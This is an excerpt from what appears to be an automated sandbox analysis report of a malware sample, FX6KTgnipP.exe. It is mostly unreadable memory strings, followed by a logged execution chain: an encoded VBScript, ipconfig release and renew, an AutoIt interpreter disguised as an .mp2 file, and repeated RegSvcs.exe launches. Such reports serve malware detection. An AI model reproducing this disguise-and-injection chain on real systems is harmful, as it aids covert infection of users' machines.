                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /w"/+memstr_0d3b2d49-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #d%|/memstr_a1c74de6-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +u566qmemstr_8a450c6a-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0~-?,memstr_cc18d441-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )[1l5memstr_2d826df0-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d.|+nmemstr_1abd84c0-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %:0y3memstr_3b7521ca-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -m)^$memstr_93c3fa8e-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6o)r*#(memstr_260d592b-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1]1{,memstr_deb1f97b-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4p&75memstr_dfb0b67a-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j$v0memstr_2fa12034-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *e((/jmemstr_22636af5-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /4-#&e#memstr_71e1b44f-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +x+4m&o3memstr_62af9ab1-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &\2h(memstr_1bb735fb-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )w'%%f&memstr_01918d23-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6o#`4memstr_299c847c-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )p#.+.#n46/memstr_4dd3b85b-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2,2r&memstr_94acc884-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p3n/{&$ memstr_aa0228de-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3-&n!memstr_e38eef1d-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +v/!.memstr_0ee8ba17-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <+)0[8memstr_fc8f4d62-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !6b#memstr_ade64e7c-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #6(b&memstr_a4f987ce-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )t!f,{ memstr_8267fdc7-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +x7|09'memstr_bf736b76-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,w/%+memstr_ba832f77-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m$j$g*7*f memstr_0b3ba7d8-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ !p6memstr_b2e3c69a-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m)h7memstr_0834a891-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %,(;5memstr_a4f13008-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#-c memstr_19571758-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .$*x+p!memstr_6d40cbe1-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2y"33memstr_3e6e2b8b-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .b"r,memstr_d2287af8-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !t602memstr_823c5a09-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !t"*#c0kmemstr_2fb74167-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -.8$,#"y&m$memstr_5129db9f-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u+m-t'memstr_53bea6ec-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (v6b7i+memstr_c72e8405-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +q&:1memstr_a989fa27-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &q$**memstr_d7965768-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !u*j+memstr_47732388-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /u4=%memstr_a3aed3c2-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %6$p'memstr_c2668f8c-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #5/28memstr_458e3a02-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'l3d%o+memstr_6c002bb4-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {!x,q$memstr_0512eb62-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '_%z6memstr_298f5b54-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$%@#memstr_62fa5905-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'n$3+memstr_89bbc99e-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 29#e"memstr_62bea019-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 87)|-memstr_9d9f380a-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -?/w+s2memstr_d10a1833-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j,`#-,memstr_9258d342-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /_6e.memstr_ea1d7cb0-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'l&e-memstr_7896d084-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $a+\$memstr_8a6f0599-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1t,7#z(memstr_75c64600-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ("+?)memstr_ed4f7a3d-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 738,memstr_e9a87d83-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0c'-umemstr_7438cf8c-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +z)u*memstr_a7fe1385-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"|)g$memstr_a154f04a-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 90y2_memstr_7f07e5a6-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0n-y&memstr_7f62c01d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2e*:2|'memstr_c99e0d15-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $f1v )-%2memstr_ec2b1ea2-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !)\(memstr_fca02e69-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4x a,memstr_f3130514-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2_#&+a4%*memstr_31eace8c-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3t"g1memstr_5993ae1b-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7<2)&t-memstr_406e422f-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1t5).memstr_d75e5860-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &;"w!memstr_5bc4a922-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)3!umemstr_fa4d9cb1-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )_"'!smemstr_ac06f604-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t&$memstr_798f60d8-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +i*/0memstr_27b4d0bd-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /v.;.memstr_d7afc05c-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'h+(8memstr_d6d9be36-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .y+s'x33-memstr_467c4a5e-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 'a2memstr_99db396b-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3t)*memstr_8f9a60fa-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7)e$i(memstr_036eea4d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3{4j(memstr_fb914d50-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $[5e8memstr_9719385f-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %g#j(memstr_442a3868-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $>3r$$#memstr_093ca55e-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (-= memstr_0efd064d-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -`"c)v'memstr_bf86eb88-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !}"w#memstr_6936700a-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *e+'0z!memstr_3538206d-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "u$f$memstr_02b71c22-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2;2x-memstr_1f25c586-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +n)t,u'memstr_18d218cd-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r()"+memstr_6291c9c6-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .,17/memstr_4e55c375-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (24f*$!memstr_8281cdfe-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n+2%1-memstr_94185ebd-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0w&&/;#i"0 memstr_97c46629-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /1)*'/2memstr_9a15f1cc-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0b*j%j'@3memstr_2d6a20a0-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k!!*f"memstr_a18afd86-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +k!q5+5memstr_057ad33d-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #9r"o)memstr_b8f81bcb-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y!q#&{"memstr_fa749306-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )s3! memstr_6ec85790-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,$s5smemstr_204d5885-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -@%^'memstr_86a87180-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *("-#memstr_44534736-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -$7z.memstr_78a9f494-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n"<#+1f4memstr_18efdf1e-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -%0('memstr_08c8e2f7-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -z,@/memstr_645e8904-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (q,b"memstr_c06ff5d5-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6m3h/memstr_a7f39f39-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '5%%5memstr_f0f47192-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q3.~#memstr_8d09fe27-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !s-k {+memstr_03235987-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -,0t)memstr_860164dc-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >',$m8memstr_c726773b-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %y-{2f0\/memstr_7fb869af-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *#o1memstr_17b0a4ae-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_13*memstr_5c123951-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f/7+memstr_cadd3cf1-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "d3_&].memstr_9a3aa673-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0o*h2memstr_6b1fe25e-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %*2v2memstr_d2373df0-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0j0&.z+memstr_457c2d88-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !d017memstr_a7a12aa3-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &q8o"f memstr_1af9fa1d-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +%)](y(memstr_248713b5-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f7n5memstr_fdd2b909-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4z r.memstr_5dd94be0-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /h12#memstr_62582f51-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %.$^"memstr_c9ca45cd-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &8%^#memstr_6ee9d8a8-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *5"q*x&c6memstr_8d3c9948-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b+t2r+memstr_c2daf98f-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +r'x"memstr_f60d46c6-0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BBB02 SendInput,keybd_event,7_2_008BBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BEB81 mouse_event,7_2_008BEB81
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.binJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.binJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_008B13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_008B1EF3
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071C5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.00000000010F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2263022121.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
